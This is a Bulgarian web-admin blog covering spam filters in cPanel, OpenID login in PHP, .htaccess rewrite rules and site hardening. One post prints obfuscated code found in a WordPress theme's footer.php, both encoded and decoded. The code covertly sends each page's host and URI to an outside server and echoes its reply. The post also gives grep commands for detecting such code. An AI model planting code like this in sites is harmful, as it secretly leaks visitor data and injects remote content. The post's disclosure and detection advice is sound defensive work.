За мен СПАМ е всяко едно неочаквано имейл съобщение, дори запитване дали може да ми пратят непоискано съобщение

Напоследък върлува следния досаден СПАМ със заглавие: „Въпрос от Бизнес Каталог България“ и текст:

Уважаеми Дами и Господа,
Бихме желали да поискаме разрешение да ви изпратим непоискано търговско съобщение.
Темата му е „Каталог Медия и Реклама 2010″
Ако искате да го прочетете, можете да посетите този линк …
Ако не желаете да получавате повече полезна информация от нас, можете да запишете Вашият мейл тук …
С уважение,
Бизнес Каталог България
02 421 40 44
www.cаtаlogbg.biz

office@cаtаlogbg.biz

office@bаzi-dаnni.com

Това съобщение се получава по няколко пъти в една пощенска кутия. На пръв поглед това е съвсем културно съобщение, но искам да ти обърна внимание, че подобна опция при която се записваш, че не желаеш да получаваш имейли е много опасна! Това е сигурен начин да покажеш, че този имейл не само е валиден, а се преглежда редовно от човек. След като натрупат солидна база данни с примерно 20 000 имейла, тази компания може да реши тайно да продаде тази база с имейл адреси и тогава наистина ще започнеш да получаваш много съобщения. Подобен сценарий се случва всеки ден по света. Трябва добре да познаваш фирмата, която стои отсреща и да и имаш доверие. Например Google.

Ако искаш да спреш да получаваш подобни имейли във всичките мейл акаунти на твоя сайт и ако използваш хостинг с cPanel, може да направиш това, като блокираш този изпращач да не може да ти изпраща повече имейли. Това се прави лесно.

Блокиране на СПАМ през cPanel

Влез в cPanel контролния панел на твоя хостинг, в секцията Mail избери “Account Level Filtering”. Натисни бутона [Create a new Filter]. В първото поле Filter Name: въведи някакво име, което да те подсеща за какво е филтъра, например bazidanni. В полето под „Rules“ в първия падащ списък остави избрано From, а във втория избери contains и в полето отдолу въведи bazi-danni.com. В падащия списък под Actions остави избрано Discard Message. Натисни бутона [Activate] и ще имаш филтър, който ще унищожава всички имейл съобщения, които съдържат в хедъра си From низа bazi-danni.com. От този момент няма да получаваш повече писма, от пощенски кутии, които завършват на @bazi-danni.com.

По подобен начин може да зададеш друг филтър, като например вместо From избереш Subject и като текст въведеш Viagra. По този начин ще бъдат изтривани автоматично писма с оферти за виагра.

Темата е доста обширна и тук е даден само бърз пример

Някой от страниците на сайта ganbox.com реших да са достъпни само след логване, затова ми се наложи да си направя логин форма, през която потребителите да се логват и да получават достъп. Обикновено една такава система включва в себе си няколко функции: страница за регистриране, страница за логване, страница за забравена парола, страница за промяна на парола или други лични данни, управление на сесии, база данни с данни за потребителите. Мислих няколко варианта и накрая реших, че без последните две няма как да мина, но нямам време да правя другите страници. Затова избрах решение с OpenID логване.

Какво е OpenID?

Съвсем накратко: с една парола достъп до много сайтове. Това е метод, който обединява протокол и системи, който ти дава възможност да се регистрираш в един сайт и след това да получаваш достъп до много други сайтове, които поддържат OpenID, само като се логваш в първия сайт.

Как работи OpenID

Регистрираш се в един сайт, който е доставчик на OpenID и там получаваш данни за достъп до акаунта, които обикновено са комбинация от имейл и парола или потребителско име и парола. От този момент можеш да се логваш във всеки един сайт, който поддържа този доставчик на OpenID.

Някои от сайтовете, като например сайта за споделяне на връзки dao.bg (а и много други подобни сайтове), изискват първо да си създадеш профил в сайта и едва след това може да присъединиш OpenID идентификатор в профила си, за да може да се логваш с OpenID.

Трик за сигурност: След като въведеш OpenID е препоръчително да смениш паролата си в този сайт с някаква невъзможно сложна и дълга парола.Тъй като няма повече да ползваш тази парола, от съображения за сигурност е по-добре да не може да бъде налучкана от хакери.

Предимства на OpenID

1. Без измисляне на нови пароли.

Не е нужно да помниш много пароли, а само една и по-рядко ще ти се случва да забравиш паролата си.

2. Бърза регистрация.

В повечето сайтове, в които искаш да влезеш няма да ти се налага да се регистрираш или ако има такава стъпка доста от данните ще бъдат попълнени, защото се изпращат от сайта доставчик на OpenID.

3. На уеб програмистите спестява време.

Отпада нуждата от програмиране на няколко уеб страници.

4. По-висока степен на сигурност.

Виж по-долу в параграфа Сигурност.

Недостатъци на OpenID

Хора които са слабо запознати с интернет технологиите и с OpenID могат да се уплашат, че за вход в твоя сайт трябва да въведат паролата си за Гугъл. Това се случи в ganbox.com, затова в логин страницата поставих блок Информация.

Сигурност

Всъщност метода на логване през OpenID е с висока степен на сигурност, защото въвеждаш паролата си в страница на Гугъл защитена с SSL и това, което Google изпраща към сайта, в който се логваш се контролира от теб. В случая на ganbox.com това е единствено имейл адреса, като при първото изпращане ти получаваш предупреждение за това и се съгласяваш с това действие.

Трябва да гледаш с добро око на сайтовете, които предлагат OpenID логин. Повечето хора използват една и съща парола за няколко сайта. Ако и ти правиш така, то при използване на OpenID избягваш следния риск (макар и минимален). При регистриране в нов сайт в момента на въвеждане на паролата е възможно някой от администраторите да получи тази парола в чист текст. След това той може да злоупотреби и ще има достъп до всичките сайтове, в които използваш тази парола. При OpenID нямаш този проблем, защото в новия сайт не се изпраща парола.

Логване с OpenID в страница на PHP

В ganbox.com за начало като OpenID доставчик избрах Google, защото почти всеки има поща в gmail.com или ползва друга услуга на Google и има Google акаунт. В последствие може да се добавят още доставчици, като например Facebook и човек ще може да си избира с кой от двата да се логне.

В този урок ще покажа как да си направиш логване в твоя сайт през акаунт на Гугъл.

1. Изтегли си библиотеката class.openid.php, разархивирай файла и го постави в директория inc, която трябва да е в главната уеб директория.

2. В главната уеб директория създай два файла login.php и return.php

Основния код в login.php, който стартира процес по логване е:

Функция user_logged() проверява дали потребителя се е логнал.
Последния параметър true на GoogleOpenId::login указва дали твоя сайт ще изиска имейл адрес.
Този ред ще пренасочи браузъра към страница за логване в Google профил (ако вече не си логнат в Гугъл), след като се логнеш първият път ще ти се изведе съобщение, че сайта изисква имейл и трябва да се съгласиш да предоставиш тази информация, след което ще те редиректнат отново към http://ganbox.com/return.php

В return.php основния код е:

В този код функцията user_login() се грижи да създаде сесия и да отбележи, че потребителя е логнат. Ако до момента не е имало потребител с подадения имейл, автоматично го регистрира и логва.
Това е всичко по оторизирането на потребителя – просто и бързо.

След това във всяка страница, в което искам да огранича достъпа викам функция user_logged(), която проверява дали потребителя е логнат и ако не е логнат или ако сесията е изтекла се пренасочва към страница за логване.

Работещ пример има в сайта ganbox.com, като с ограничен достъп са страниците Класиране на сайт, SEO състояние на сайт и Промяна на снимка.
Това е накратко. Ако има интерес и имам време мога да дам пълните кодове. Пишете коментари!

Пиша тази статия за всички ползващи WordPress, които не обичат да ги следят без тяхно знание.

Проблем:

Безплатна тема за WordPress с име Red_wave от автор AskGraphics се разпространява свободно на сайта http://wordpresstemplates.name, но открих, че съдържа във файла footer.php следния обфускиран PHP код:

<? eval(gzinflate(base64_decode(‘vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+

X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5

K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNS

Se/o3KiJhSMq1Fk6i5rCV1llGS6mAHub2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqmodSM0h5p4

HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A’))); ?>

(Всичко това е на един ред).

Което всъщност представлява следния зашифрован PHP код за проследяване:

error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])
."&uri=".urlencode($_SERVER["REQUEST_URI"]);

if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen")))
&& function_exists("file_get_contents")) {
	echo @file_get_contents($CodeURL);
} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen")))
&& function_exists("file")) {
	$content = @file($CodeURL);
	echo @join("", $content);
} elseif (function_exists("curl_init")) {
	$ch = curl_init($CodeURL);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_exec($ch);
	curl_close($ch);
}

Както се вижда този скрипт изпраща до сървъра linkdock.com не само името на вашия домейн, а и точната страница, която в момента отваря посетителя.

Защо го правят?

С този код получават интернет трафик от различни уникални IP адреси, който се отчита в статистиките на сървъра им. Отчитат се повече посещения и сървъра може да продава рекламите си по-скъпо.
Решение:

Просто изтрий този ред от файла wp-content/themes/Red_wave/footer.php

В случая скрипта не носи някаква вреда, освен че забавя излишно зареждането на всяка една страница от блога и ако отсрещния сървър е претоварен, това ще доведе до много дълго време за зареждане на твоите страници на блога и дъното на сайта може да се чупи и размества. Ако твоя блог е прекалено често бавен, това няма да се хареса на бота на Google и е възможно твоя сайт да падне в SERP-а.

Често тази техника се ползва за да може автора на плъгина да вгради връзка към своя сайт, която да не може да бъде лесно открита и изтрита, но е възможно злонамерен сайт да разпространява безплатни темплейти или плъгини за WordPress, които да навредят на сайта, като например да изтрият всички статии.

Общи съвети за сигурност

Нека тази статия бъде предупреждение за всеки, който ползва темплейти или плъгини от непроверен източник. Съветвам те след като си свалиш тема или плъгин първо да пуснеш търсене в текста на всички файлове за опасни функции като eval(). Под Linux това става като от конзолата влезеш в директория wp-content и потърсиш с команда:

grep --include=*.php -r "eval(" *

Трябва тази команда да не изведе нищо. Ако излезеш една директория нагоре в главната уеб директория и пуснеш командата отново, там ще има няколко резултата, но повод за притеснение има само ако съдържат  base64_decode или gzinflate. Може да провериш това с командата:

grep --include=*.php -r "eval(" * | grep -e "base64_decode\|gzinflate"

Ако в eval има кодиран низ, като този по-горе и не знаеш как да го провериш, тогава по-добре не ползвай тази тема или плъгин. Колкото по красиво и професионално изглежда тимплейта, толкова по-силно ще се изкушаваш да го вградиш в твоя блог, но не искаш данните ти да пострадат нали? Знай, че това е възможно и много лесно да се направи.

Друг проблем със сигурността е небрежно написан код, който създава дупка в сигурността без знанието на разработчика на софтуера. Сигурно в 95% от случаите на хакване на сайт се дължат на това. Всеки допълнителен плъгин, който добавяш увеличава вероятността да поставиш дупка в сигурността в твоя сайт, затова не инсталирай плъгини, които не ползваш или такива, които ползваш много рядко.

Старите версии на WordPress имаха дупки в сигурността и вероятно и в бъдеще ще има такива. Много хора си мислят, че като качат най-новата версия на софтуера и така са защитени, но това не винаги е така.

Правило за обновяване на софтуер

Ето едно просто правило за обновяване, което важи не само за WordPress, а и за всеки един софтуер: В момента последната версия на WordPress е 2.8.4 и ако излезе нова версия 2.8.x като 2.8.5 или 2.8.6 обикновено запушва дупки в сигурността и поправя бъгове, затова е добре да я инсталираш веднага. Например 2.8.4 поправя дупка в сигурността на версии <=2.8.3, чрез която може да се променя паролата на admin, затова веднага обнови до тази версия.

Но ако излезе версия с нова цифра като 2.9 (или направо 3.0) е много вероятно такава версия да има дупки в сигурността и е по-добре да изчакаш версия 2.9.1 или дори 2.9.2 и чак тогава да обновиш софтуера си. По този начин намаляваш риска значително.

Промяната на интернет адреси с mod_rewrite се прави основно по следните seo причини:

• съкращаване на адресите: адресите стават за индексиране от търсачките (seo friendly) и лесни за ръчно изписване в браузър
• пренасочване на стари адреси към нови при преименуване на файлове на страници
• ако има страници, които се достъпват с повече от един адрес се пренасочват излишните адреси
• скриване на вида файлове на страниците на сайта

Пренасочванията се извършват от правила зададени във файла .htaccess, който трябва да се намира в главната уеб директория.

Правилата използват регулярни изрази (regular expressions) и могат да бъдат много сложни. В тази статия обаче ще разгледам само най-често ползваните правила от SEO специалистите.

За да работи този файл е нужно уеб сървъра да има инсталиран модул mod_rewrite и в конфигурационния файл /etc/httpd/conf/httpd.conf  трябва да е зададена опцията AllowOverride All

На повечето съвременни хостинг сървъри тези опции са включени по подразбиране, ако това не е така ще трябва да се свържеш със системния администратор на хостинга.

Проверка дали mod_rewrite работи

Постави следните редове в .htaccess файла и опитай да отвориш адреса http://domain.com/test  където domain.com е името на твоя сайт. Ако се отвори сайта ganbox.com това значи всичко е наред и mod_rewrite работи.

Options +FollowSymLinks

RewriteEngine On
RewriteBase /

RewriteRule test http://ganbox.com/? [NC,R,L]

Обикновено файла .htaccess започва със следните няколко реда. За краткост ще бъдат пропускани в примерите долу.

Options +FollowSymLinks -Indexes -MultiViews
RewriteEngine On
RewriteBase /

Просто пренасочване на преименувана страница

Ако страница /about.html е преименувана на /contact.php

redirect 301 /about.html /contact.php

аналогично

RewriteRule ^about\.html$ /contact.php [R=permanent,L]

[L]  казва, че това е последното правило, което трябва да се обработи.

Скриване на вида файлове

Всеки адрес от вида domain.com/страница, като страница може да съдържа малки или главни букви, цифри и знаците „-“ и „_“.

RewriteRule ^([-\w0-9_]+)$ /$1.php [L,NC,QSA]

Пример: при написване на адрес domain.com/форма-за-контакти2 ще бъде потърсена страница /форма-за-контакти2.php

Внимание: ако уеб съръвра е на Windows машина, горния регулярен израз вероятно няма да сработи,заради бъг в win32 mod_rewrite апаче модула.

RewriteRule ^([-А-Яа-яA-Za-z0-9_]+)$ /$1.asp [L,NC,QSA]

Вместо \w или А-Яа-яA-Za-z  използвай АБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЬЮЯабвгдежзийклмнопрстуфхцчшщъьюяA-Za-z

В този пример при написване на адрес domain.com/Условия_За_Ползване ще бъде потърсена страница /Условия_За_Ползване.asp

като в полето за адреси на браузъра ще остане да се вижда http://domain.com/Условия_За_Ползване

Очевидно е, че по този начин няма как да се разбере какви скриптове управляват страниците на сайта. Дори може да се направи страниците да изглеждат като html файлове, а да се изпълняват едноименни php файлове с правилото:

RewriteRule ^([-А-Яа-яA-Za-z0-9_]+)\.html$ /$1.php [QSA,L]

в този случай ако напишеш http://domain.com/clients.html ще бъде потърсен файла /clients.php. Този подход има двоен положителен ефект – от една страна търсачките и от друга сигурност.

Съкращаване на адреси

Много често при SEO оптимизация на динамични сайтове с CMS се налага съкращаване на адреси.

Дълги адреси като този

http://domain.com/index.php?sec=pro&cat=48&category=avto

да изглеждат като този

http://domain.com/sec/pro/cat/48/category/avto

RewriteRule
^sec/([^/]+)/cat/([0-9]+)/category/([^/]+)/?$
/index.php?sec=$1&cat=$2&category=$3 [QSA,L]

Разбира се горното правило се пише на един ред, като между отделните части има по един интервал.

След това в кода се правят промени на всички места, които образуват връзки, за да откриеш всички тези места може да търсиш във всички файлове за http или за href.

Хубавото е, че старите адреси продължават да работят и не е проблем за хората, които са направили Bookmark към стар адрес.

Пренасочване на адреси към един файл

Превод на адреси от вида www.domain.com/contacts към файл index.php, като подава по GET в променлива p името на страницата www.domain.com/index.php?p=contacts

# ако не бъде открит файл
RewriteCond %{SCRIPT_FILENAME} !-f

# ако не бъде открита директория
RewriteCond %{SCRIPT_FILENAME} !-d

# подава низа към файла index.php
RewriteRule ^([^/]+)/?$ /index.php?p=$1 [QSA,L]

По този начин всеки адрес ще се изпраща за обработка към един единствен файл index.php често наричан диспечер (dispatcher).

В този файл се взема подадения низ и се слага в променлива $page. След това се проверява и ако файла със страницата не съществува се преминава към страница с грешка 404.php

$page= isset($_GET['p']) ? $_GET['p'] : 'home';
if(!file_exists(ABS_PATH.$page.'.php')) $page = '404';
include_once(ABS_PATH.$page.'.php');

От съображения за сигурност е много важно преди този код да е дефинирана константата ABS_PATH като в нея има абсолютен път до главната уеб директория например:

define('ABS_PATH', '/home/account/www/');

където account е потребителско име за cpanel на хостинга.

Ако се очаква в адреса на страницата да има само латински букви и тирета, тогава в index.php преди реда с file_exists добави следния ред:

$page = preg_replace('|[^A-Za-z_-]|','',$page);
# премахва всичко различно от буква и знаците _ и -

Премахване на проблем с дублирани адреси

Наскоро имах следния проблем при оптимизиране на динамичен сайт. В навигацията сайта има два бутона за превключване на езика с българското и английското знаме.

Ако текущия адрес е http://domain.com/page.php?id=7

то бутона с английското знаме сочи към http://domain.com/page.php?lang=en&id=7

а бутона с българското знаме към http://domain.com/page.php?lang=bg&id=7

От потребителска гледна точка е удобно защото при смяна на езика оставаш в текущата страница, но от гледна точка на търсачката всяка страница на български има по два адреса.

Дори началната страница има 3 адреса: http://domain.com,  http://domain.com/index.php  и  http://domain.com/index.php?lang=bg

Решение:

# премахване на всички низове index.* от интернет адреса.
# Заб. Изтрий тези две правила ако искаш да инсталираш форум или блог

RewriteCond %{THE_REQUEST} \ /(.+/)?index\.([^/]+)(\?.*)?\  [NC]
RewriteRule ^(.+/)?index\.([^/]+)$ /%1 [NC,R=301,L]

# Правила за премахване на параметър lang=bg като запазва всичко останало в адреса

RewriteCond %{QUERY_STRING} ^(([^&]*&)*)(lang=bg)($|&)(.*)
RewriteRule .* $0?%1%5 [N,E=REMOVED:true]
RewriteCond %{ENV:REMOVED} true
RewriteRule ^ %{REQUEST_URI} [L,R=301]

Внимание: Ако добавиш първите две правила за премахване на index от адресите и в последствие решиш да инсталираш форум, блог или някакъв CMS в поддиректория в същия сайт, се очаква да имаш проблеми и  инсталацията няма да може да се извърши.

Премахване на www.

Пренасочване на  www.domain.com/страница  към domain.com/страница

RewriteCond %{HTTP_HOST} ^www\.(domain\.com)$ [NC]
RewriteRule ^(.*)$ http://%1%{REQUEST_URI} [R=301,L]

Други полезни трикове в .htaccess

Ограничаване на достъпа

по IP адрес

За да забраниш достъпа до сайта от IP адрес 207.246.65.22 в началото на файла напиши

# ban web proxy
Deny from 207.246.65.22

За да забраниш цялата мрежа 64.4.0.0 – 64.4.63.255 на Microsoft и техния MSN Bot напиши

Deny from 64.4.0.0/18

За да забраниш няколко  мрежи в Киев от които в блога вали спам изпращан от различни IP адреси като: 95.133.140.7, 95.133.192.198 и др. напиши:

Deny from 91.124.0.0/16
Deny from 91.195.12.0/23
Deny from 94.178.0.0/15
Deny from 95.132.0.0/14

Има предвид, че така блокираш много хора от Киев. Прецени сам дали очакваш читатели от там.

по тип на търсения файл

Забрана за показване на файлове, които завършват на .txt

<Files ~ "\.txt$">
    Order allow,deny
    Deny from all
</Files>

по вид браузър

Ако имаш директория /old в която има стара версия на сайта, която поддържа архаичния браузър Internet Explorer 6, може да пренасочиш всички заявки от такъв браузър заедно с подадените параметри към тях.

# за браузър IE6 или по-стар пренасочва към /old
RewriteCond %{HTTP_USER_AGENT} MSIE\ [1-6]
RewriteRule !^old(/.*)?$ /old%{REQUEST_URI} [QSA,L]

забрана на достъп до сайт през прокси

Напиши всичките тези правила и ще ограничиш достъпа до сайта от огромно количество свободни уеб прокси сайтове. Много е полезно за сайтове с форуми, където често потребителите си правят втори профил през прокси, за да се представят за друг човек.

RewriteCond %{HTTP:VIA}                 !^$ [OR]

RewriteCond %{HTTP:FORWARDED}           !^$ [OR]

RewriteCond %{HTTP:USERAGENT_VIA}       !^$ [OR]

RewriteCond %{HTTP:X_FORWARDED_FOR}     !^$ [OR]

RewriteCond %{HTTP:PROXY_CONNECTION}    !^$ [OR]

RewriteCond %{HTTP:XPROXY_CONNECTION}   !^$ [OR]

RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:XROXY_CONNECTION}    !^$ [OR]

RewriteCond %{HTTP:X-FORWARDED-FOR}     !^$ [OR]
RewriteCond %{HTTP:FORWARDED-FOR}       !^$ [OR]
RewriteCond %{HTTP:X-FORWARDED}         !^$ [OR]
RewriteCond %{HTTP:HTTP_CLIENT_IP}      !^$

RewriteRule ^(.*)$ - [F]

Сигурност

Много важно! Ако ползваш на твоя сайт едно от следните: картинки против автоматични регистрации (captcha),  smarty темплейти или имаш директория, в която могат да се качват снимки или други файлове. Тогава вероятно тези директории имат повече права за писане в тях. Възможно е хакер да се възползва от тази слабост и да качи в такава директория root shell скрипт, който му дава достъп до файлове, база данни и изпълнение на команди. Пример за такива директории в WordPress са тези в  wp-content/uploads. Много добра идея е в такива директории да поставиш htaccess подобен на следния:

<Files ~ "^.*\.(php|pl|log|bak)">
 Order allow,deny
 Deny from all
 Satisfy All
</Files>

Това забранява достъпа до php и pl файлове качени в тази директория. Допълни в първия ред разделени с | разширенията на всички типове файлове, които не се очаква да присъстват в тази директория. Друг вариант е, ако директорията е само за картинки да изброиш типовете файлове, които се очакват да са в директорията със следния htaccess файл:

RewriteCond %{REQUEST_URI} !(\.(gif|jpe?g|png)$)
RewriteRule .* - [F,L]

Копирай този файл във всички директории за картинки. Сложи този файл в директорията upload на WordPress и той ще защити всички поддиректории, които се създават. В зависимост какви файлове качваш в блога, може да разшириш списъка. При мен е  !(\.(gif|jpe?g|png|zip|doc|xls|xml|html|txt)$) разбира се НЕ трябва да добавяш php иначе се губи смисъла.

Най-добрия вариант е ако може всички подобни директории да бъдат едно ниво нагоре извън главната уеб директория. Така няма да има нужда от htaccess в тях, защото дори хакер да качи файл няма да може да го достъпи през уеб. И освен това всеки път като архивираш проекта на сайта няма да копираш мегабайти излишна временна информация.

Обработка на грешки

Задаване на различни обработчици на възникнали грешки: служебна страница със съобщение , локална страница или файл на друг сървър.

ErrorDocument 403 "Sorry! Access denied!"

ErrorDocument 404 /404.html

ErrorDocument 500 http://drug.domain.com/error

в този пример, ако бъде написан адрес към несъществуваща страница, ще бъде зареден файла /404.html

Продължава в статията Пренасочване на домейн.

© В статията са ползвани материали от forum.modrewrite.com